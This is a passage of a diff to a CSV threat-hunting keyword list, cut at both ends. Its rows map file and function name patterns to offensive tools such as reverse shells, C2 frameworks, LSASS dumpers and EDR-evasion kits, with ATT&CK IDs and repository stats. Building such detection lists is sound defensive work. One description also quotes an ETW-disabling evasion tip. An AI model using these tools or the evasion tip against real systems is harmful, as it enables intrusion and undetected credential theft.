- T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*completedns-get-ns-history*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*COMPlus_ETWEnabled=0\0\0\0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*comsvcs_lsass*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ComsvcsLSASS*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*Confuser.CLI.Exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*connormcgarr/tgtdelegation*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*-consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*contact_harvester*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ContainYourself.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" @@ -8721,14 +8869,14 @@ "*ContainYourselfPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc\*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfTempFile.txt*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*ConvertTo-Shellcode -*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert 